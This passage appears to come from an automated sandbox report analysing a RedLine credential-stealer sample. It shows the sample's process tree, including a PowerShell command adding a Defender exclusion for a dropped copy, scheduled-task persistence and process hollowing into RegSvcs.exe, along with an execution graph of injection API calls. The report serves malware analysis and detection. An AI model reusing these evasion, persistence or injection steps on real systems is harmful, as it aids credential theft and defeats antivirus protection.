                                                                      Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 2f 3e 3c 2f 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>


                                                                      Statistics

                                                                      CPU Usage

                                                                      Click to jump to process

                                                                      Memory Usage

                                                                      Click to jump to process

                                                                      High Level Behavior Distribution

                                                                      Click to dive into process behavior distribution

                                                                      Behavior

                                                                      Click to jump to process

                                                                      System Behavior

                                                                      General

                                                                      Target ID:0
                                                                      Start time:05:29:13
                                                                      Start date:07/10/2024
                                                                      Path:C:\Users\user\Desktop\13P2mxLaQk.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\Desktop\13P2mxLaQk.exe"
                                                                      Imagebase:0xc70000
                                                                      File size:592'896 bytes
                                                                      MD5 hash:B47604CCFF9C611EAF0AA3D7443827B7
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1460490924.0000000004009000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.1460490924.0000000004009000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000000.00000002.1460490924.0000000004009000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:3
                                                                      Start time:05:29:14
                                                                      Start date:07/10/2024
                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\VWGccZGgix.exe"
                                                                      Imagebase:0xaf0000
                                                                      File size:433'152 bytes
                                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:4
                                                                      Start time:05:29:14
                                                                      Start date:07/10/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff6ee680000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:5
                                                                      Start time:05:29:14
                                                                      Start date:07/10/2024
                                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VWGccZGgix" /XML "C:\Users\user\AppData\Local\Temp\tmp2CA3.tmp"
                                                                      Imagebase:0xbb0000
                                                                      File size:187'904 bytes
                                                                      MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:6
                                                                      Start time:05:29:14
                                                                      Start date:07/10/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff6ee680000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:7
                                                                      Start time:05:29:15
                                                                      Start date:07/10/2024
                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                      Imagebase:0xdb0000
                                                                      File size:45'984 bytes
                                                                      MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.1595538384.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000007.00000002.1595538384.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000007.00000002.1595538384.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:8
                                                                      Start time:05:29:16
                                                                      Start date:07/10/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff6ee680000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:9
                                                                      Start time:05:29:16
                                                                      Start date:07/10/2024
                                                                      Path:C:\Users\user\AppData\Roaming\VWGccZGgix.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Users\user\AppData\Roaming\VWGccZGgix.exe
                                                                      Imagebase:0x1a0000
                                                                      File size:592'896 bytes
                                                                      MD5 hash:B47604CCFF9C611EAF0AA3D7443827B7
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Antivirus matches:
                                                                      • Detection: 58%, ReversingLabs
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:10
                                                                      Start time:05:29:18
                                                                      Start date:07/10/2024
                                                                      Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                      Imagebase:0x7ff605670000
                                                                      File size:496'640 bytes
                                                                      MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:11
                                                                      Start time:05:29:19
                                                                      Start date:07/10/2024
                                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VWGccZGgix" /XML "C:\Users\user\AppData\Local\Temp\tmp3EC3.tmp"
                                                                      Imagebase:0xbb0000
                                                                      File size:187'904 bytes
                                                                      MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:12
                                                                      Start time:05:29:19
                                                                      Start date:07/10/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff6ee680000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:13
                                                                      Start time:05:29:19
                                                                      Start date:07/10/2024
                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                      Imagebase:0x9f0000
                                                                      File size:45'984 bytes
                                                                      MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000D.00000002.1631278597.0000000002DC0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:14
                                                                      Start time:05:29:19
                                                                      Start date:07/10/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff6ee680000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Disassembly

                                                                      Reset < >

                                                                        Execution Graph

                                                                        Execution Coverage:10.5%
                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                        Signature Coverage:2%
                                                                        Total number of Nodes:251
                                                                        Total number of Limit Nodes:15
                                                                        execution_graph 37989 2dfd4c8 DuplicateHandle 37990 2dfd55e 37989->37990 37991 7771620 37995 7771656 37991->37995 37999 7771658 37991->37999 37992 777163f 37996 777165e 37995->37996 38003 7771698 37996->38003 37997 7771686 37997->37992 38000 7771661 37999->38000 38002 7771698 DrawTextExW 38000->38002 38001 7771686 38001->37992 38002->38001 38004 77716db 38003->38004 38005 77716ca 38003->38005 38006 7771769 38004->38006 38009 7771da8 38004->38009 38014 7771d98 38004->38014 38005->37997 38006->37997 38010 7771dd0 38009->38010 38011 7771ed4 38010->38011 38019 77724ab 38010->38019 38024 77724b8 38010->38024 38011->38005 38015 7771da8 38014->38015 38016 7771ed4 38015->38016 38017 77724ab DrawTextExW 38015->38017 38018 77724b8 DrawTextExW 38015->38018 38016->38005 38017->38016 38018->38016 38020 77724b8 38019->38020 38029 7772920 38020->38029 38033 7772910 38020->38033 38021 7772544 38021->38011 38025 77724ce 38024->38025 38027 7772920 DrawTextExW 38025->38027 38028 7772910 DrawTextExW 38025->38028 38026 7772544 38026->38011 38027->38026 38028->38026 38038 7772950 38029->38038 38043 7772960 38029->38043 38030 777293e 38030->38021 38034 7772920 38033->38034 38036 7772960 DrawTextExW 38034->38036 38037 7772950 DrawTextExW 38034->38037 38035 777293e 38035->38021 38036->38035 38037->38035 38039 7772955 38038->38039 38040 77729be 38039->38040 38048 77729e0 38039->38048 38053 77729d0 38039->38053 38040->38030 38044 7772991 38043->38044 38045 77729be 38044->38045 38046 77729e0 DrawTextExW 38044->38046 38047 77729d0 DrawTextExW 38044->38047 38045->38030 38046->38045 38047->38045 38050 7772a01 38048->38050 38049 7772a16 38049->38040 38050->38049 38058 7771c78 38050->38058 38052 7772a71 38055 77729e0 38053->38055 38054 7772a16 38054->38040 38055->38054 38056 7771c78 DrawTextExW 38055->38056 38057 7772a71 38056->38057 38060 7771c83 38058->38060 38059 7772df9 38059->38052 38060->38059 38064 77738c1 38060->38064 38067 77738d0 38060->38067 38061 7772f0b 38061->38052 38065 77738ed 38064->38065 38070 7771d8c 38064->38070 38065->38061 38068 7771d8c DrawTextExW 38067->38068 38069 77738ed 38068->38069 38069->38061 38072 7773908 DrawTextExW 38070->38072 38073 77739ae 38072->38073 38073->38065 38084 2dfaef8 38087 2dfaff0 38084->38087 38085 2dfaf07 38088 2dfb024 38087->38088 38089 2dfb001 38087->38089 38088->38085 38089->38088 38090 2dfb228 GetModuleHandleW 38089->38090 38091 2dfb255 38090->38091 38091->38085 38092 2df4668 38093 2df4672 38092->38093 38095 2df4758 38092->38095 38096 2df477d 38095->38096 38100 2df4858 38096->38100 38104 2df4868 38096->38104 38101 2df4868 38100->38101 38103 2df496c 38101->38103 38108 2df45c8 38101->38108 38106 2df488f 38104->38106 38105 2df496c 38105->38105 38106->38105 38107 2df45c8 CreateActCtxA 38106->38107 38107->38105 38109 2df5cf8 CreateActCtxA 38108->38109 38111 2df5dbb 38109->38111 38111->38111 38112 7a1bdd8 38113 7a1bf63 38112->38113 38115 7a1bdfe 38112->38115 38115->38113 38116 7a19e68 38115->38116 38117 7a1c058 PostMessageW 38116->38117 38118 7a1c0c4 38117->38118 38118->38115 37799 7a17fee 37800 7a17ffd 37799->37800 37801 7a17fe1 37800->37801 37805 7a1ab88 37800->37805 37823 7a1ab38 37800->37823 37840 7a1ab28 37800->37840 37806 7a1ab6e 37805->37806 37808 7a1ab92 37805->37808 37857 7a1b103 37806->37857 37865 7a1b5be 37806->37865 37869 7a1b27d 37806->37869 37874 7a1b05d 37806->37874 37879 7a1b37a 37806->37879 37884 7a1b6bb 37806->37884 37889 7a1b458 37806->37889 37897 7a1afb9 37806->37897 37901 7a1b155 37806->37901 37906 7a1b875 37806->37906 37911 7a1b013 37806->37911 37919 7a1b48e 37806->37919 37924 7a1b60f 37806->37924 37932 7a1b7cd 37806->37932 37807 7a1ab5a 37807->37800 37824 7a1ab52 37823->37824 37825 7a1ab5a 37824->37825 37826 7a1b103 4 API calls 37824->37826 37827 7a1b7cd 4 API calls 37824->37827 37828 7a1b60f 4 API calls 37824->37828 37829 7a1b48e 2 API calls 37824->37829 37830 7a1b013 4 API calls 37824->37830 37831 7a1b875 2 API calls 37824->37831 37832 7a1b155 2 API calls 37824->37832 37833 7a1afb9 2 API calls 37824->37833 37834 7a1b458 4 API calls 37824->37834 37835 7a1b6bb 2 API calls 37824->37835 37836 7a1b37a 2 API calls 37824->37836 37837 7a1b05d 2 API calls 37824->37837 37838 7a1b27d 2 API calls 37824->37838 37839 7a1b5be 2 API calls 37824->37839 37825->37800 37826->37825 37827->37825 37828->37825 37829->37825 37830->37825 37831->37825 37832->37825 37833->37825 37834->37825 37835->37825 37836->37825 37837->37825 37838->37825 37839->37825 37842 7a1ab38 37840->37842 37841 7a1ab5a 37841->37800 37842->37841 37843 7a1b103 4 API calls 37842->37843 37844 7a1b7cd 4 API calls 37842->37844 37845 7a1b60f 4 API calls 37842->37845 37846 7a1b48e 2 API calls 37842->37846 37847 7a1b013 4 API calls 37842->37847 37848 7a1b875 2 API calls 37842->37848 37849 7a1b155 2 API calls 37842->37849 37850 7a1afb9 2 API calls 37842->37850 37851 7a1b458 4 API calls 37842->37851 37852 7a1b6bb 2 API calls 37842->37852 37853 7a1b37a 2 API calls 37842->37853 37854 7a1b05d 2 API calls 37842->37854 37855 7a1b27d 2 API calls 37842->37855 37856 7a1b5be 2 API calls 37842->37856 37843->37841 37844->37841 37845->37841 37846->37841 37847->37841 37848->37841 37849->37841 37850->37841 37851->37841 37852->37841 37853->37841 37854->37841 37855->37841 37856->37841 37941 7a17880 37857->37941 37945 7a17878 37857->37945 37858 7a1b121 37859 7a1b82c 37858->37859 37949 7a17940 37858->37949 37953 7a17939 37858->37953 37859->37807 37860 7a1b4c6 37957 7a17370 37865->37957 37961 7a17369 37865->37961 37866 7a1b5aa 37870 7a1b2a0 37869->37870 37872 7a17940 WriteProcessMemory 37870->37872 37873 7a17939 WriteProcessMemory 37870->37873 37871 7a1b765 37872->37871 37873->37871 37875 7a1b87e 37874->37875 37965 7a17a30 37875->37965 37969 7a17a28 37875->37969 37876 7a1b8a0 37880 7a1b8bf 37879->37880 37882 7a17940 WriteProcessMemory 37880->37882 37883 7a17939 WriteProcessMemory 37880->37883 37881 7a1b8e3 37882->37881 37883->37881 37885 7a1b737 37884->37885 37886 7a1b6be 37884->37886 37887 7a17940 WriteProcessMemory 37885->37887 37888 7a17939 WriteProcessMemory 37885->37888 37887->37886 37888->37886 37890 7a1b01f 37889->37890 37890->37807 37890->37889 37891 7a1b15d 37890->37891 37892 7a1b0c4 37890->37892 37973 7a172c0 37890->37973 37977 7a172b9 37890->37977 37893 7a17370 Wow64SetThreadContext 37891->37893 37894 7a17369 Wow64SetThreadContext 37891->37894 37892->37807 37893->37892 37894->37892 37981 7a17bc8 37897->37981 37985 7a17bbd 37897->37985 37902 7a1b15d 37901->37902 37904 7a17370 Wow64SetThreadContext 37902->37904 37905 7a17369 Wow64SetThreadContext 37902->37905 37903 7a1b0c4 37903->37807 37904->37903 37905->37903 37907 7a1b87d 37906->37907 37908 7a1b8a0 37907->37908 37909 7a17a30 ReadProcessMemory 37907->37909 37910 7a17a28 ReadProcessMemory 37907->37910 37909->37908 37910->37908 37912 7a1b01f 37911->37912 37912->37807 37913 7a1b15d 37912->37913 37914 7a1b0c4 37912->37914 37915 7a172c0 ResumeThread 37912->37915 37916 7a172b9 ResumeThread 37912->37916 37917 7a17370 Wow64SetThreadContext 37913->37917 37918 7a17369 Wow64SetThreadContext 37913->37918 37914->37807 37915->37912 37916->37912 37917->37914 37918->37914 37920 7a1b494 37919->37920 37922 7a17940 WriteProcessMemory 37920->37922 37923 7a17939 WriteProcessMemory 37920->37923 37921 7a1b4c6 37922->37921 37923->37921 37925 7a1b01f 37924->37925 37925->37807 37926 7a1b15d 37925->37926 37927 7a1b0c4 37925->37927 37928 7a172c0 ResumeThread 37925->37928 37929 7a172b9 ResumeThread 37925->37929 37930 7a17370 Wow64SetThreadContext 37926->37930 37931 7a17369 Wow64SetThreadContext 37926->37931 37927->37807 37928->37925 37929->37925 37930->37927 37931->37927 37933 7a1b7e2 37932->37933 37934 7a1b01f 37932->37934 37934->37807 37934->37932 37935 7a1b15d 37934->37935 37936 7a1b0c4 37934->37936 37939 7a172c0 ResumeThread 37934->37939 37940 7a172b9 ResumeThread 37934->37940 37937 7a17370 Wow64SetThreadContext 37935->37937 37938 7a17369 Wow64SetThreadContext 37935->37938 37936->37807 37937->37936 37938->37936 37939->37934 37940->37934 37942 7a178c0 VirtualAllocEx 37941->37942 37944 7a178fd 37942->37944 37944->37858 37946 7a17880 VirtualAllocEx 37945->37946 37948 7a178fd 37946->37948 37948->37858 37950 7a17947 WriteProcessMemory 37949->37950 37952 7a179df 37950->37952 37952->37860 37954 7a17940 WriteProcessMemory 37953->37954 37956 7a179df 37954->37956 37956->37860 37958 7a17377 Wow64SetThreadContext 37957->37958 37960 7a173fd 37958->37960 37960->37866 37962 7a17370 Wow64SetThreadContext 37961->37962 37964 7a173fd 37962->37964 37964->37866 37966 7a17a7b ReadProcessMemory 37965->37966 37968 7a17abf 37966->37968 37968->37876 37970 7a17a30 ReadProcessMemory 37969->37970 37972 7a17abf 37970->37972 37972->37876 37974 7a172c7 ResumeThread 37973->37974 37976 7a17331 37974->37976 37976->37890 37978 7a172c0 ResumeThread 37977->37978 37980 7a17331 37978->37980 37980->37890 37982 7a17c51 CreateProcessA 37981->37982 37984 7a17e13 37982->37984 37986 7a17bc8 CreateProcessA 37985->37986 37988 7a17e13 37986->37988 37988->37988 38074 2dfd280 38075 2dfd2c6 GetCurrentProcess 38074->38075 38077 2dfd318 GetCurrentThread 38075->38077 38078 2dfd311 38075->38078 38079 2dfd34e 38077->38079 38080 2dfd355 GetCurrentProcess 38077->38080 38078->38077 38079->38080 38083 2dfd38b 38080->38083 38081 2dfd3b3 GetCurrentThreadId 38082 2dfd3e4 38081->38082 38083->38081

                                                                        Executed Functions

                                                                        Function 07A10A4A Relevance: .1, Instructions: 100COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1465742862.0000000007A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7a10000_13P2mxLaQk.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d121a9d0c5b67ef281792554a24c074aae4664988bd1a8baee211a85e66dc7d4
                                                                        • Instruction ID: 5bafd18b06d0681ad362be890b8dac061338ee9daba9b9617234f12d3ee59891
                                                                        • Opcode Fuzzy Hash: d121a9d0c5b67ef281792554a24c074aae4664988bd1a8baee211a85e66dc7d4
                                                                        • Instruction Fuzzy Hash: 6C3172B1D097588FFB19CF6798007DABFB7AFC6200F04C0AAD458AA261DB340596CF61
                                                                        Function 07A1B6BB Relevance: .0, Instructions: 30COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1465742862.0000000007A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7a10000_13P2mxLaQk.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 15c0b9513cbe8adcb535374d022995808a598fa027c3e40fb4bd7dcba42a82a0
                                                                        • Instruction ID: a2540da03f68bc8e576a7927592338b4a31c740eb9b3e01a92888350b548bc72
                                                                        • Opcode Fuzzy Hash: 15c0b9513cbe8adcb535374d022995808a598fa027c3e40fb4bd7dcba42a82a0
                                                                        • Instruction Fuzzy Hash: 4FF0B2B6919118CFEB11CF54C880AE8BBB9BB0A304F045199E459A7252C335AA92CF14
                                                                        Function 02DFD270 Relevance: 6.1, APIs: 4, Instructions: 132threadCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • GetCurrentProcess.KERNEL32 ref: 02DFD2FE
                                                                        • GetCurrentThread.KERNEL32 ref: 02DFD33B
                                                                        • GetCurrentProcess.KERNEL32 ref: 02DFD378
                                                                        • GetCurrentThreadId.KERNEL32 ref: 02DFD3D1
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1459699560.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2df0000_13P2mxLaQk.jbxd
                                                                        Similarity
                                                                        • API ID: Current$ProcessThread
                                                                        • String ID:
                                                                        • API String ID: 2063062207-0
                                                                        • Opcode ID: 9a2b620051e7011f588804444c629a12f7b0b65f14f959d41ed11d6f4c0e8525
                                                                        • Instruction ID: e9952a36aee98de4d89d29a5c217b15dde4bdf47adc2d5c55c69e521d8b40399
                                                                        • Opcode Fuzzy Hash: 9a2b620051e7011f588804444c629a12f7b0b65f14f959d41ed11d6f4c0e8525
                                                                        • Instruction Fuzzy Hash: BE5165B0900709CFEB54CFA9D548BEEBBF1BB88304F248059E509A73A1DB749944CB66
                                                                        Function 02DFD280 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 93 2dfd280-2dfd30f GetCurrentProcess 97 2dfd318-2dfd34c GetCurrentThread 93->97 98 2dfd311-2dfd317 93->98 99 2dfd34e-2dfd354 97->99 100 2dfd355-2dfd389 GetCurrentProcess 97->100 98->97 99->100 102 2dfd38b-2dfd391 100->102 103 2dfd392-2dfd3ad call 2dfd451 100->103 102->103 105 2dfd3b3-2dfd3e2 GetCurrentThreadId 103->105 107 2dfd3eb-2dfd44d 105->107 108 2dfd3e4-2dfd3ea 105->108 108->107
                                                                        APIs
                                                                        • GetCurrentProcess.KERNEL32 ref: 02DFD2FE
                                                                        • GetCurrentThread.KERNEL32 ref: 02DFD33B
                                                                        • GetCurrentProcess.KERNEL32 ref: 02DFD378
                                                                        • GetCurrentThreadId.KERNEL32 ref: 02DFD3D1
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1459699560.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2df0000_13P2mxLaQk.jbxd
                                                                        Similarity
                                                                        • API ID: Current$ProcessThread
                                                                        • String ID:
                                                                        • API String ID: 2063062207-0
                                                                        • Opcode ID: 922af3971aa0cb6040e049dd6696c84893cc3a0a578c17c4903800a40766a073
                                                                        • Instruction ID: 072a6d13bfe4b0f93bf5ec31c367a0cc93df9ba45ac32c97b1ae14552b2861c0
                                                                        • Opcode Fuzzy Hash: 922af3971aa0cb6040e049dd6696c84893cc3a0a578c17c4903800a40766a073
                                                                        • Instruction Fuzzy Hash: AA5156B0900709CFDB54CFAAD548B9EBBF1BF88314F248059E509A7391DB746944CF66
                                                                        Function 07A17BBD Relevance: 1.7, APIs: 1, Instructions: 246processCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 115 7a17bbd-7a17c5d 118 7a17c96-7a17cb6 115->118 119 7a17c5f-7a17c69 115->119 126 7a17cb8-7a17cc2 118->126 127 7a17cef-7a17d1e 118->127 119->118 120 7a17c6b-7a17c6d 119->120 121 7a17c90-7a17c93 120->121 122 7a17c6f-7a17c79 120->122 121->118 124 7a17c7b 122->124 125 7a17c7d-7a17c8c 122->125 124->125 125->125 129 7a17c8e 125->129 126->127 128 7a17cc4-7a17cc6 126->128 135 7a17d20-7a17d2a 127->135 136 7a17d57-7a17e11 CreateProcessA 127->136 130 7a17ce9-7a17cec 128->130 131 7a17cc8-7a17cd2 128->131 129->121 130->127 133 7a17cd4 131->133 134 7a17cd6-7a17ce5 131->134 133->134 134->134 137 7a17ce7 134->137 135->136 138 7a17d2c-7a17d2e 135->138 147 7a17e13-7a17e19 136->147 148 7a17e1a-7a17ea0 136->148 137->130 140 7a17d51-7a17d54 138->140 141 7a17d30-7a17d3a 138->141 140->136 142 7a17d3c 141->142 143 7a17d3e-7a17d4d 141->143 142->143 143->143 145 7a17d4f 143->145 145->140 147->148 158 7a17eb0-7a17eb4 148->158 159 7a17ea2-7a17ea6 148->159 161 7a17ec4-7a17ec8 158->161 162 7a17eb6-7a17eba 158->162 159->158 160 7a17ea8 159->160 160->158 164 7a17ed8-7a17edc 161->164 165 7a17eca-7a17ece 161->165 162->161 163 7a17ebc 162->163 163->161 167 7a17eee-7a17ef5 164->167 168 7a17ede-7a17ee4 164->168 165->164 166 7a17ed0 165->166 166->164 169 7a17ef7-7a17f06 167->169 170 7a17f0c 167->170 168->167 169->170 172 7a17f0d 170->172 172->172
                                                                        APIs
                                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07A17DFE
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1465742862.0000000007A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7a10000_13P2mxLaQk.jbxd
                                                                        Similarity
                                                                        • API ID: CreateProcess
                                                                        • String ID:
                                                                        • API String ID: 963392458-0
                                                                        • Opcode ID: ac661a7849e87c19275d0d1a32e9caf2b3dbca65bff127f66dd73fbe0fdae2bd
                                                                        • Instruction ID: 3192651eeff8bc0a0a1d9f37a4530d6ac0af8c8d139af36ce870a9f666a28fae
                                                                        • Opcode Fuzzy Hash: ac661a7849e87c19275d0d1a32e9caf2b3dbca65bff127f66dd73fbe0fdae2bd
                                                                        • Instruction Fuzzy Hash: B9A14EB1D00219DFEB10DF69C8417EEBBF2BF88310F1485A9D858A7280DB759985CF92
                                                                        Function 07A17BC8 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
